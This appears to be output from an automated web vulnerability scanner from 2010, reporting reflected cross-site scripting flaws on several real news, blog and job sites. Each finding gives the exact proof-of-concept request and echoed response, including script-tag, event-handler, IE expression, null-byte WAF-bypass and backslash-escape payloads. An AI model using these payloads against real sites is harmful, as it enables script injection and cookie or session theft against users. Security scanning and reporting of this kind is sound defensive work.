HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/ent/?p=47411>; rel=shortlink ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 34261 Date: Thu, 25 Nov 2010 03:34:47 GMT X-Varnish: 136324891 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/ent/generale1691\"><script>alert(1)</script>d8026cbd7ed/cookie-monster-lobbies-for-snl-gig/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca1a"><script>alert(1)</script>657ebe2a02a was submitted in the REST URL parameter 3. This input was echoed as 5ca1a\"><script>alert(1)</script>657ebe2a02a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ent/general/cookie-monster-lobbies-for-snl-gig5ca1a"><script>alert(1)</script>657ebe2a02a/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 25 Nov 2010 03:34:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 29058 Date: Thu, 25 Nov 2010 03:34:49 GMT X-Varnish: 136324934 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig5ca1a\"><script>alert(1)</script>657ebe2a02a/"/> ...[SNIP]...
2.24. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blogs.canoe.ca
Path:
/ent/general/cookie-monster-lobbies-for-snl-gig/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6a9"><script>alert(1)</script>96607731768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6a9\"><script>alert(1)</script>96607731768 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ent/general/cookie-monster-lobbies-for-snl-gig/?eb6a9"><script>alert(1)</script>96607731768=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/ent/?p=47411>; rel=shortlink ServerID: blogswordpress-prod-fe-02 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 34267 Date: Thu, 25 Nov 2010 03:34:46 GMT X-Varnish: 1749439679 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-01 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/?eb6a9\"><script>alert(1)</script>96607731768=1"/> ...[SNIP]...
2.25. http://blogs.canoe.ca/loadthis/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blogs.canoe.ca
Path:
/loadthis/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704a4"><script>alert(1)</script>37fcfb8bb67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 704a4\"><script>alert(1)</script>37fcfb8bb67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loadthis/?704a4"><script>alert(1)</script>37fcfb8bb67=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache ServerID: blogswordpress-prod-fe-02 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 65161 Date: Thu, 25 Nov 2010 03:34:40 GMT X-Varnish: 136324700 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/loadthis/?704a4\"><script>alert(1)</script>37fcfb8bb67=1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0967"><script>alert(1)</script>b7c1d13b7b0 was submitted in the REST URL parameter 2. This input was echoed as c0967\"><script>alert(1)</script>b7c1d13b7b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel/vacation-timec0967"><script>alert(1)</script>b7c1d13b7b0/is-the-airport-experience-too-intrusive/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/travel/?p=12031>; rel=shortlink ServerID: blogswordpress-prod-fe-02 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 43354 Date: Thu, 25 Nov 2010 03:34:38 GMT X-Varnish: 136324620 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/travel/vacation-timec0967\"><script>alert(1)</script>b7c1d13b7b0/is-the-airport-experience-too-intrusive/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca97"><script>alert(1)</script>90f0d532ff was submitted in the REST URL parameter 3. This input was echoed as cca97\"><script>alert(1)</script>90f0d532ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel/vacation-time/is-the-airport-experience-too-intrusivecca97"><script>alert(1)</script>90f0d532ff/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 25 Nov 2010 03:34:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 28898 Date: Thu, 25 Nov 2010 03:34:39 GMT X-Varnish: 1749439483 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-01 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusivecca97\"><script>alert(1)</script>90f0d532ff/"/> ...[SNIP]...
2.28. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930de"><script>alert(1)</script>509944ca179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 930de\"><script>alert(1)</script>509944ca179 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel/vacation-time/is-the-airport-experience-too-intrusive/?930de"><script>alert(1)</script>509944ca179=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/travel/?p=12031>; rel=shortlink ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 43360 Date: Thu, 25 Nov 2010 03:34:36 GMT X-Varnish: 136324570 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/?930de\"><script>alert(1)</script>509944ca179=1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57645"><script>alert(1)</script>a7718bd3c3a was submitted in the REST URL parameter 2. This input was echoed as 57645\"><script>alert(1)</script>a7718bd3c3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vancouver2010/general57645"><script>alert(1)</script>a7718bd3c3a/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/vancouver2010/?p=32671>; rel=shortlink ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 38272 Date: Thu, 25 Nov 2010 03:34:48 GMT X-Varnish: 136324905 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/vancouver2010/general57645\"><script>alert(1)</script>a7718bd3c3a/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537cc"><script>alert(1)</script>27e8a14e0e5 was submitted in the REST URL parameter 3. This input was echoed as 537cc\"><script>alert(1)</script>27e8a14e0e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess537cc"><script>alert(1)</script>27e8a14e0e5/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 25 Nov 2010 03:34:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache ServerID: blogswordpress-prod-fe-01 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 20295 Date: Thu, 25 Nov 2010 03:34:49 GMT X-Varnish: 136324935 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess537cc\"><script>alert(1)</script>27e8a14e0e5/"/> ...[SNIP]...
2.31. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa79e"><script>alert(1)</script>334bc9a1cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa79e\"><script>alert(1)</script>334bc9a1cfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/?fa79e"><script>alert(1)</script>334bc9a1cfe=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/vancouver2010/?p=32671>; rel=shortlink ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 38278 Date: Thu, 25 Nov 2010 03:34:46 GMT X-Varnish: 1749439676 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-01 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/?fa79e\"><script>alert(1)</script>334bc9a1cfe=1"/> ...[SNIP]...
2.32. http://blogs.constantcontact.com/commentary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blogs.constantcontact.com
Path:
/commentary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de329"><script>alert(1)</script>ebcb993e5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de329\"><script>alert(1)</script>ebcb993e5f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /commentary?de329"><script>alert(1)</script>ebcb993e5f2=1 HTTP/1.1 Host: blogs.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ad1"><script>alert(1)</script>2e6b8afcfce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /Ajilon-Consulting-jobs-in-Montr..al,-QC?b6ad1"><script>alert(1)</script>2e6b8afcfce=1 HTTP/1.1 Host: ca.indeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the news_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71b6a"style%3d"x%3aexpression(alert(1))"ea638476782 was submitted in the news_id parameter. This input was echoed as 71b6a"style="x:expression(alert(1))"ea638476782 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /health_news_details.asp?news_id=3143571b6a"style%3d"x%3aexpression(alert(1))"ea638476782&news_channel_id=0 HTTP/1.1 Host: chealth.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 03:42:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 46301 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQTAQCCC=PNLJCCLCIKIAPBODFNCNDNPG; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Health news - Healthcare in Canada - C-Health</title> <meta na ...[SNIP]... ver/rate.gif';document.getElementById('TextRating').innerHTML='';" alt="Poor" coords="0,0,11,12" href="/channel_health_news_details.asp?channel_id=131&relation_id=1883&news_channel_id=131&news_id=3143571b6a"style="x:expression(alert(1))"ea638476782&rid=&article_rating=1#ratings"> ...[SNIP]...
The value of the news_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4049d"%3balert(1)//fde5c83bfe5 was submitted in the news_id parameter. This input was echoed as 4049d";alert(1)//fde5c83bfe5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /health_news_details.asp?news_id=314354049d"%3balert(1)//fde5c83bfe5&news_channel_id=0 HTTP/1.1 Host: chealth.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 03:42:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 46187 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQTAQCCC=MOLJCCLCNJMKHHFEAIPGGCJH; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>Health news - Healthcare in Canada - C-Health</title> <meta na ...[SNIP]... =errmsg[i]+"\n"; } alert(messageout);
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %001b15e<a>345c8e79e91 was submitted in the REST URL parameter 1. This input was echoed as 1b15e<a>345c8e79e91 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%001b15e<a>345c8e79e91/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 03:44:41 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009988d"><script>alert(1)</script>59f5c717b90 was submitted in the REST URL parameter 1. This input was echoed as 9988d"><script>alert(1)</script>59f5c717b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%009988d"><script>alert(1)</script>59f5c717b90/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 03:44:40 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ff30<a>59bd28133bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again4ff30<a>59bd28133bd/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 03:44:46 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Thu, 25 Nov 2010 03:44:46 GMT Last-Modified: Thu, 25 Nov 2010 03:44:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
2.39. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19452"><script>alert(1)</script>6e92e150851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19452\"><script>alert(1)</script>6e92e150851 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?19452"><script>alert(1)</script>6e92e150851=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2208a<img%20src%3da%20onerror%3dalert(1)>9a836349a8 was submitted in the REST URL parameter 2. This input was echoed as 2208a<img src=a onerror=alert(1)>9a836349a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy2208a<img%20src%3da%20onerror%3dalert(1)>9a836349a8/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc53b"><img%20src%3da%20onerror%3dalert(1)>e6dc10d55d7 was submitted in the REST URL parameter 2. This input was echoed as fc53b"><img src=a onerror=alert(1)>e6dc10d55d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedyfc53b"><img%20src%3da%20onerror%3dalert(1)>e6dc10d55d7/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e72f\'%3bab0f9db786f was submitted in the REST URL parameter 2. This input was echoed as 4e72f\\';ab0f9db786f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedy4e72f\'%3bab0f9db786f/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedy4e72f\\';ab0f9db786f'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Alex Trebek Is a Jerk'; // modified by VIDEO APP this.sectionLevel5 = ''; this.section ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd8f2"><img%20src%3da%20onerror%3dalert(1)>5c5ab24b88c was submitted in the REST URL parameter 3. This input was echoed as dd8f2"><img src=a onerror=alert(1)>5c5ab24b88c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopersdd8f2"><img%20src%3da%20onerror%3dalert(1)>5c5ab24b88c/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96810\'%3bb61018c4722 was submitted in the REST URL parameter 2. This input was echoed as 96810\\';b61018c4722 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
